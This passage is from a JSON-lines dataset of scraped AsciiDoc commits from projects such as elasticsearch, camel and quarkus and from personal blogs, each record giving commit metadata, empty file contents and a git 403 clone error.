elasticsearch,liweinan0423\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,MaineC\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,liweinan0423\/elasticsearch,a2lin\/elasticsearch,qwerty4030\/elasticsearch,a2lin\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,i-am-Nathan\/elasticsearch,s1monw\/elasticsearch,s1monw\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,nezirus\/elasticsearch,nezirus\/elasticsearch,C-Bish\/elasticsearch,mjason3\/elasticsearch,njlawton\/elasticsearch,C-Bish\/elasticsearch,brandonkearby\/elasticsearch,shreejay\/elasticsearch,MaineC\/elasticsearch,i-am-Nathan\/elasticsearch,elasticdog\/elasticsearch,wangtuo\/elasticsearch,MaineC\/elasticsearch,JackyMai\/elasticsearch,spiegela\/elasticsearch,lks21c\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,alexshadow007\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,nazarewk\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,fred84\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,LeoYao\/elasticsearch,qwerty4030\/elasticsearch,vroyer\/elasticassandra,masaruh\/elasticsearch,ZTE-PaaS\/elasticsearch,mikemccand\/elasticsearch,maddin2016\/elasticsearch,Shepard1212\/elasticsearch,maddin2016\/elasticsearch,wangtuo\/elasticsearch,LeoYao\/elasticsearch,JervyShi\/elasticsearch,rajanm\/elasticsearch,winstonewert\/elasticsearch,winstonewert\/elasticsearch,yanjunh\/elasticsearch,coding0011\/elasticsearch,masaruh\/elasticsearch,fernandozhu\/elasticsearch,masaruh\/elasticsearch,i-am-Nathan\/elasticsearch,alexshadow007\/elasticsearch,strapdata\/elassandra,fred84\/elasticsearch,njlawton\/elasticsearch,glefloch\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,jimczi\/elasticsearch,Shepard1212\/elasticsearch,a2lin\/elasticsearch,StefanGor\/elasticsearch,yanjunh\/elasticsearch,gmarz\/elasticsearch,IanvsPoplicola\/elasticsearch,GlenRSmith\/elasticsearch,wenpos\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,gfyoung\/elasticsearch,MisterAndersen\/elasticsearch,JackyMai\/elasticsearch,HonzaKral\/elasticsearch,IanvsPoplicola\/elasticsearch,brandonkearby\/elasticsearch,fforbeck\/elasticsearch,MisterAndersen\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,markwalkom\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,gfyoung\/elasticsearch,spiegela\/elasticsearch,dongjoon-hyun\/elasticsearch,qwerty4030\/elasticsearch,gmarz\/elasticsearch,rajanm\/elasticsearch,sneivandt\/elasticsearch,fred84\/elasticsearch,fforbeck\/elasticsearch,nknize\/elasticsearch,brandonkearby\/elasticsearch,masaruh\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scottsom\/elasticsearch,henakamaMSFT\/elasticsearch,mortonsykes\/elasticsearch,mortonsykes\/elasticsearch,MisterAndersen\/elasticsearch,obourgain\/elasticsearch,njlawton\/elasticsearch,coding0011\/elasticsearch,artnowo\/elasticsearch,LewayneNaidoo\/elasticsearch,njlawton\/elasticsearch,kalimatas\/elasticsearch,rajanm\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,JSCooke\/elasticsearch,IanvsPoplicola\/elasticsearch,yanjunh\/elasticsearch,jimczi\/elasticsearch,LeoYao\/elasticsearch,bawse\/elasticsearch,geidies\/elasticsearch,nknize\/elasticsearch,alexshadow007\/elasticsearch,Helen-Zhao\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,Helen-Zhao\/elasticsearch,IanvsPoplicola\/elasticsearch,glefloch\/elasticsearch,nknize\/elasticsearch,StefanGor\/elasticsearch,nazarewk\/elasticsearch,robin13\/elasticsearch,Stacey-Gammon\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,glefloch\/elasticsearch,gingerwizard\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,ricardocerq\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,Stacey-Gammon\/elasticsearch,jprante\/elasticsearch,LewayneNaidoo\/elasticsearch,i-am-Nathan\/elasticsearch,mjason3\/elasticsearch,vroyer\/elasticassandra,rlugojr\/elasticsearch,rajanm\/elasticsearch,IanvsPoplicola\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,robin13\/elasticsearch,wangtuo\/elasticsearch,alexshadow007\/elasticsearch,liweinan0423\/elasticsearch,uschindler\/elasticsearch,JSCooke\/elasticsearch,jprante\/elasticsearch,jprante\/elasticsearch,mikemccand\/elasticsearch,spiegela\/elasticsearch,qwerty4030\/elasticsearch,pozhidaevak\/elasticsearch,ZTE-PaaS\/elasticsearch,ZTE-PaaS\/elasticsearch,robin13\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,nilabhsagar\/elasticsearch,GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,mikemccand\/elasticsearch,LeoYao\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,gfyoung\/elasticsearch,nazarewk\/elasticsearch,pozhidaevak\/elasticsearch,vroyer\/elassandra,rlugojr\/elasticsearch,wenpos\/elasticsearch,nezirus\/elasticsearch,jimczi\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,scorpionvicky\/elasticsearch,fred84\/elasticsearch,gmarz\/elasticsearch,naveenhooda2000\/elasticsearch,scorpionvicky\/elasticsearch,jprante\/elasticsearch,s1monw\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,nilabhsagar\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,scottsom\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,elasticdog\/elasticsearch,mohit\/elasticsearch,rlugojr\/elasticsearch,mortonsykes\/elasticsearch,qwerty4030\/elasticsearch,rlugojr\/elasticsearch,ZTE-PaaS\/elasticsearch,sneivandt\/elasticsearch,strapdata\/elassandra,bawse\/elasticsearch,ricardocerq\/elasticsearch,gingerwizard\/elasticsearch,obourgain\/elasticsearch,mjason3\/elasticsearch,wuranbo\/elasticsearch,lks21c\/elasticsearch,Shepard1212\/elasticsearch,Stacey-Gammon\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,pozhidaevak\/elasticsearch,JackyMai\/elasticsearch,henakamaMSFT\/elasticsearch,maddin2016\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,gmarz\/elasticsearch,gingerwizard\/elasticsearch,winstonewert\/elasticsearch,obourgain\/elasticsearch","old_file":"docs\/reference\/migration\/migrate_6_0.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_0.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8030def695aadd2a2c0cbeadcf94ad87f2ae4c1c","subject":"CAMEL-11497 - add rollback-eip considering transactional-client.adoc from export of current camel-web","message":"CAMEL-11497 - add rollback-eip considering transactional-client.adoc from export of current camel-web\n","repos":"nikhilvibhav\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,CodeSmell\/camel,zregvart\/camel,alvinkwekel\/camel,objectiser\/camel,apache\/camel,DariusX\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,CodeSmell\/camel,dmvolod\/camel,anoordover\/camel,pmoerenhout\/camel,curso007\/camel,anoordover\/camel,anoordover\/camel,kevinearls\/camel,tadayosi\/camel,tdiesler\/camel,Fabryprog\/camel,jonmcewen\/camel,pax95\/camel,onders86\/camel,mcollovati\/camel,dmvolod\/camel,dmvolod\/camel,dmvolod\/camel,mcollovati\/camel,CodeSmell\/camel,cunningt\/camel,tadayosi\/camel,nikhilvibhav\/camel,sverkera\/camel,nicolaferraro\/camel,gautric\/camel,ullgren\/camel,pax95\/camel,jamesnetherton\/camel,Fabryprog\/camel,curso007\/camel,apache\/camel,cunningt\/camel,gnodet\/camel,tdiesler\/camel,pax95\/camel,gautric\/camel,nicolaferraro\/camel,akhettar\/camel,snurmine\/camel,akhettar\/camel,dmvolod\/camel,christophd\/camel,gnodet\/camel,jonmcewen\/camel,jonmcewen\/camel,gautric\/camel,mcollovati\/camel,akhettar\/camel,gautric\/camel,snurmine\/camel,christophd\/camel,jonmcewen\/camel,tdiesler\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,tdiesler\/camel,nikhilvibhav\/camel,sverkera\/camel,jamesnetherton\/camel,pmoerenhout\/camel,christophd\/camel,apache\/camel,christophd\/camel,Fabryprog\/camel,snurmine\/camel,jonmcewen\/camel,davidkarlsen\/camel,alvinkwekel\/camel,gnodet\/camel,adessaigne\/camel,snurmine\/camel,alvinkwekel\/camel,sverkera\/camel,gautric\/camel,objectiser\/camel,snurmine\/camel,tadayosi\/camel,jamesnetherton\/camel,anoordover\/camel,adessaigne\/camel,christophd\/camel,curso007\/camel,pax95\/camel,kevinearls\/camel,kevinearls\/camel,cunningt\/camel,gautric\/camel,apache\/camel,onders86\/camel,kevinearls\/camel,punkhorn\/camel-upstream,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,onders86\/camel,onders86\/camel,pax95\/camel,tadayosi\/camel,onders86\/camel,davidkarlsen\/camel,DariusX\/camel,ullgren\/camel,kevinearls\/camel,gnodet\/camel,sverkera\/camel,anoordover\/camel,pmoerenhout\/camel,zregvart\/camel,jamesnetherton\/camel,christophd\/camel,objectiser\/camel,alvinkwekel\/camel,zregvart\/camel,mcollovati\/camel,curso007\/camel,DariusX\/camel,cunningt\/camel,apache\/camel,akhettar\/camel,davidkarlsen\/camel,tadayosi\/camel,objectiser\/camel,ullgren\/camel,adessaigne\/camel,sverkera\/camel,gnodet\/camel,onders86\/camel,ullgren\/camel,punkhorn\/camel-upstream,akhettar\/camel,cunningt\/camel,akhettar\/camel,pax95\/camel,davidkarlsen\/camel,tdiesler\/camel,curso007\/camel,sverkera\/camel,adessaigne\/camel,zregvart\/camel,nicolaferraro\/camel,jamesnetherton\/camel,dmvolod\/camel,adessaigne\/camel,DariusX\/camel,CodeSmell\/camel,punkhorn\/camel-upstream,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,nicolaferraro\/camel,kevinearls\/camel,curso007\/camel,snurmine\/camel","old_file":"camel-core\/src\/main\/docs\/eips\/rollback-eip.adoc","new_file":"camel-core\/src\/main\/docs\/eips\/rollback-eip.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5c7ae0d59a79147bba61fe412c9ceb1eedbbaa04","subject":"Update 2015-05-17-Keepster.adoc","message":"Update 2015-05-17-Keepster.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-17-Keepster.adoc","new_file":"_posts\/2015-05-17-Keepster.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ee4d4265a504a38350a17996eb4030db32d015f2","subject":"Update 2016-02-05-new-Blog.adoc","message":"Update 2016-02-05-new-Blog.adoc","repos":"nanox77\/nanox77.github.io,nanox77\/nanox77.github.io,nanox77\/nanox77.github.io","old_file":"_posts\/2016-02-05-new-Blog.adoc","new_file":"_posts\/2016-02-05-new-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nanox77\/nanox77.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5d24e01f1802d8dadcdb02b38baa321917487887","subject":"Improvements in the documentation after reinstalling OSIS.","message":"Improvements in the documentation after reinstalling OSIS.\n","repos":"uclouvain\/osis_louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"c6959f29d59d006a20840b30a813e7ebd3d84d87","subject":"Described the internationalisation in the documentation","message":"Described the internationalisation in the documentation\n","repos":"uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis_louvain,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/osis,uclouvain\/osis,uclouvain\/OSIS-Louvain,uclouvain\/OSIS-Louvain,uclouvain\/osis","old_file":"doc\/technical-manual.adoc","new_file":"doc\/technical-manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/uclouvain\/osis.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"8409fc6cf91b249a2dda2b8469d0811d9af72d71","subject":"Add missing article","message":"Add missing article\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_file":"developer-tools\/java\/chapters\/ch01-setup.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fcd3b4b407330501c255ae5d8a3ffde78c6c9ef7","subject":"removed DDC reference","message":"removed DDC reference\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_file":"developer-tools\/java\/chapters\/ch06-swarm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c65f6ef8f93f2638ba995ce6f1dede07017e924b","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b8cd022813ed66c71034cca6d075b16b56a3837c","subject":"RESTEasy Reactive docs","message":"RESTEasy Reactive docs\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/resteasy-reactive.adoc","new_file":"docs\/src\/main\/asciidoc\/resteasy-reactive.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/quarkusio\/quarkus.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aaea17b0ffbc27f76cdf337818a7178d334902da","subject":"[docs] Add admin docs for backup and restore","message":"[docs] Add admin docs for backup and restore\n\nThis patch adds the basic documentation for using the\n `KuduBackup` and `KuduRestore` Spark jobs.\n\nAdditionally it relocates the pysical backup section to\nbe colocated with the new backup documention.\n\nChange-Id: I75f92d3f10fd5d970099e933d8de2d7662e03398\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/13780\nReviewed-by: Andrew Wong <b68e4fdc6430321a6b47400732ff97d7ae91234e@cloudera.com>\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\n","repos":"helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu,helifu\/kudu","old_file":"docs\/administration.adoc","new_file":"docs\/administration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/helifu\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aa1af621e3741ac0f0c3a7c669127d0876f41052","subject":"Update 2017-08-04-mecab.adoc","message":"Update 2017-08-04-mecab.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-08-04-mecab.adoc","new_file":"_posts\/2017-08-04-mecab.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"668232bd3b4d05348994985d190adb69fa99abcb","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a59cc6c7b73974036e3b59a50a6ceb49042d11c9","subject":"basic info about redis","message":"basic info about redis\n","repos":"openshift\/openshift-tools,twiest\/openshift-tools,rhdedgar\/openshift-tools,blrm\/openshift-tools,drewandersonnz\/openshift-tools,rhdedgar\/openshift-tools,openshift\/openshift-tools,rhdedgar\/openshift-tools,joelddiaz\/openshift-tools,ivanhorvath\/openshift-tools,joelsmith\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,themurph\/openshift-tools,jupierce\/openshift-tools,rhdedgar\/openshift-tools,blrm\/openshift-tools,ivanhorvath\/openshift-tools,drewandersonnz\/openshift-tools,themurph\/openshift-tools,drewandersonnz\/openshift-tools,blrm\/openshift-tools,openshift\/openshift-tools,tiwillia\/openshift-tools,joelddiaz\/openshift-tools,ivanhorvath\/openshift-tools,jupierce\/openshift-tools,twiest\/openshift-tools,andrewklau\/openshift-tools,blrm\/openshift-tools,andrewklau\/openshift-tools,openshift\/openshift-tools,drewandersonnz\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,blrm\/openshift-tools,joelsmith\/openshift-tools,twiest\/openshift-tools,themurph\/openshift-tools,tiwillia\/openshift-tools,joelsmith\/openshift-tools,twiest\/openshift-tools,rhdedgar\/openshift-tools,ivanhorvath\/openshift-tools,tiwillia\/openshift-tools,themurph\/openshift-tools,joelsmith\/openshift-tools,tiwillia\/openshift-tools,blrm\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,twiest\/openshift-tools,jupierce\/openshift-tools,openshift\/openshift-tools,jupierce\/openshift-tools,drewandersonnz\/openshift-tools,joelddiaz\/openshift-tools,tiwillia\/openshift-tools,joelddiaz\/openshift-tools,openshift\/openshift-tools,jupierce\/openshift-tools,andrewklau\/openshift-tools,joelddiaz\/openshift-tools,andrewklau\/openshift-tools,ivanhorvath\/openshift-tools","old_file":"docs\/redis_basics.asciidoc","new_file":"docs\/redis_basics.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/openshift\/openshift-tools.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"05ce3749ef75cf0191c98e33d9305e8e9c57e8b0","subject":"update NOTES","message":"update NOTES\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6bd044cca5c072d4d1f0aa357a5d62beb935f6b","subject":"Changes to NOTES.adoc","message":"Changes to NOTES.adoc\n","repos":"jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare,jxxcarlson\/noteshare","old_file":"NOTES.adoc","new_file":"NOTES.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jxxcarlson\/noteshare.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d3ba1374961d7f6cf43d6c8a28c09536a908e0e","subject":"Update 2016-11-10-Title-issue.adoc","message":"Update 2016-11-10-Title-issue.adoc","repos":"angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io,angilent\/angilent.github.io","old_file":"_posts\/2016-11-10-Title-issue.adoc","new_file":"_posts\/2016-11-10-Title-issue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/angilent\/angilent.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1e2e7b8ddc90dcd4fd9790310d6c9b2be479c78","subject":"Update 2017-01-18-A-Tiny-Poem.adoc","message":"Update 2017-01-18-A-Tiny-Poem.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-18-A-Tiny-Poem.adoc","new_file":"_posts\/2017-01-18-A-Tiny-Poem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"464a1545fd6a9b1a1069f5d065c2ccf187cc8025","subject":"Update 2019-01-31-Hello-World.adoc","message":"Update 2019-01-31-Hello-World.adoc","repos":"PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io,PertuyF\/PertuyF.github.io","old_file":"_posts\/2019-01-31-Hello-World.adoc","new_file":"_posts\/2019-01-31-Hello-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PertuyF\/PertuyF.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3342f781b7c73ff56301fa12e4726eb24aae42a7","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa9e520b469edb81da5c904cd2ab1e33892b915b","subject":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","message":"Update 2016-04-14-Inyeccion-L-D-A-P.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_file":"_posts\/2016-04-14-Inyeccion-L-D-A-P.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"30a053670db643eed4bafe3a4ef5b51812972583","subject":"Update 2016-07-03-Rights-and-Duties.adoc","message":"Update 2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8081eabd112b6c72a524a1072c9702f30e8e25f","subject":"Update 2016-03-10-Grand-Central-Dispatch-iOS.adoc","message":"Update 2016-03-10-Grand-Central-Dispatch-iOS.adoc","repos":"jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io,jtsiros\/jtsiros.github.io","old_file":"_posts\/2016-03-10-Grand-Central-Dispatch-iOS.adoc","new_file":"_posts\/2016-03-10-Grand-Central-Dispatch-iOS.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jtsiros\/jtsiros.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ff5d5c89dc587d0a71e0b76e369883e18307ce80","subject":"Update 2016-04-19-Converting-I-Pv4-to-Binary.adoc","message":"Update 2016-04-19-Converting-I-Pv4-to-Binary.adoc","repos":"julianrichen\/blog,julianrichen\/blog,julianrichen\/blog,julianrichen\/blog","old_file":"_posts\/2016-04-19-Converting-I-Pv4-to-Binary.adoc","new_file":"_posts\/2016-04-19-Converting-I-Pv4-to-Binary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/julianrichen\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c62fdf697856e1e4900933573834f777886a6bb6","subject":"Update 2016-09-06-TWCTF-Writeups.adoc","message":"Update 2016-09-06-TWCTF-Writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_file":"_posts\/2016-09-06-TWCTF-Writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fad914ee1053c811e1526e2a5cc2102888cae19","subject":"Update 2019-01-31-Test-alt-title.adoc","message":"Update 2019-01-31-Test-alt-title.adoc","repos":"igovsol\/blog,igovsol\/blog,igovsol\/blog,igovsol\/blog","old_file":"_posts\/2019-01-31-Test-alt-title.adoc","new_file":"_posts\/2019-01-31-Test-alt-title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igovsol\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ccdb4f75183de74f071d312be92eecc352fae0c","subject":"y2b create post The Essential Phone Is Back!","message":"y2b create post The Essential Phone Is Back!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-15-The-Essential-Phone-Is-Back.adoc","new_file":"_posts\/2018-02-15-The-Essential-Phone-Is-Back.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21f47f9a6942a1ecaf945301bf22f88def359420","subject":"Update 2016-07-16-Hola-world.adoc","message":"Update 2016-07-16-Hola-world.adoc","repos":"htapia\/htapia.github.io,htapia\/htapia.github.io,htapia\/htapia.github.io,htapia\/htapia.github.io","old_file":"_posts\/2016-07-16-Hola-world.adoc","new_file":"_posts\/2016-07-16-Hola-world.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/htapia\/htapia.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"984b9024831e7766607eaf392ddc4a44d40fd233","subject":"add quality goals","message":"add quality 